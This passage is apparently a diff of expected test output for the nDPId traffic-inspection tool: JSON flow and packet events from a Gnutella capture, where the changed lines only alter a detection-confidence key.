01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2827,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":2,"flow_last_seen":174648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":174648,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB\/MAAEARKy2VHKOvCgACD8MkcAkC37mfNNYxAkNtQBP87WWbzy94OkQAAMACAAAGR1RLRwAAQTW8kBkL86J3th0pUYoQZu1JqkUElRyjr8MkAQAAAAThq6+iFEdUS0cAAFxg+taEWAYB1unX7flSWQRG3beNBGic4kjQCkdUS0cAAFuWTCQAv7KdBMgSGC6mmSLY5\/ECBMKjtH4qSVdTSFIAAFpCOi4aZIiG9lYEyciBumqkMMTzBMY62gy7KEdUS0cAAFf2jq05FgyfJOGIcRJLg6NdtQ1eBLw9NLcuTEdUS0cAAFYaYH8fxSMCFJGx6KJ1XnlYMcAbBL7A0rYaYkdUS0cAAFFI2BA3K8AVe0IqJAEnw9\/D630lBI6EpQ13ZkdUS0cAAFITSOd3gRniYdJwpHJZH2SZ8zLzBFaBxFQmu1dTSFIAAEwNRRSjJbzqx43c9rTKLbxkbHgKBF4IN57HxEdUS0cAAElxJg9dajjzW3txW7a4q7j8IGI0BFHNWy2VmVdTSFIAAEJDtkelhifx87ftq707Fzo\/U0PdBC+TNBWPeEdUS0cAAGqU5DC0wpx7Tt\/+AtuQJkODlGIrBC\/cuoxr+UdUS0cAAGSQPhJYYczqO9fA1uqwCWebPjcpBMEgftbozEdUS0cAAGfwY9tAxh1AXF0ZU2EOIfqDQ08tBHbwRccYzEdUS0cAAGcZJHUoqfb+iSo9+1Aaw4nAX4zABFAH\/MAa6EdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZsldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyQ=="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3065,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":191700,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00HEAAIARI3sKAAIPfCy+kXAJJ7oAIMCGR05EED8oAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3066,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":191700,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0uoEAAIARu5gKAAIPXFhcOHAJUhEAIBhcR05EED8pAQFUC1FLUlAGUk5BXS\/iNQlw"} @@ -1379,25 +1379,25 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3084,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":191703,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191703,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lsMAAIARXJwKAAIPVvTkVnAJJ5MAIMANR05EED87AQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3085,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":191704,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VboAAIARb2MKAAIPpanD43AJGMoAIKCTR05EED88AQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3086,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":191704,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0dUAAAIARISYKAAIPsKPnoHAJGMoAIHHbR05EED89AQFUC1FLUlAGUk5BXS\/iNQlw"} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63000,"flow_last_seen":63524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":64032,"flow_last_seen":64562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":70230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":756,"flow_tot_l4_payload_len":1058,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69141,"flow_last_seen":69581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1141,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":68108,"flow_last_seen":68639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1147,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63000,"flow_last_seen":63524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":64032,"flow_last_seen":64562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":70230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":756,"flow_tot_l4_payload_len":1058,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69141,"flow_last_seen":69581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1141,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":68108,"flow_last_seen":68639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1147,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63001,"flow_last_seen":63616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63001,"flow_last_seen":63616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":64031,"flow_last_seen":64521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1140,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":64031,"flow_last_seen":64521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1140,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":63001,"flow_last_seen":63445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":65062,"flow_last_seen":65418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1142,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":69227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1089,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00622{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":63001,"flow_last_seen":63445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":65062,"flow_last_seen":65418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1142,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":69227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1089,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00622{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3099,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":192636,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":192636,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHP0AAIARA\/4KAAIPCgAC\/wCKAIoA0X6VEQKcLwoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCAqQMATVNFREdFV0lOMTAAAAAAAAoAAxAAAA8BVaoA"} 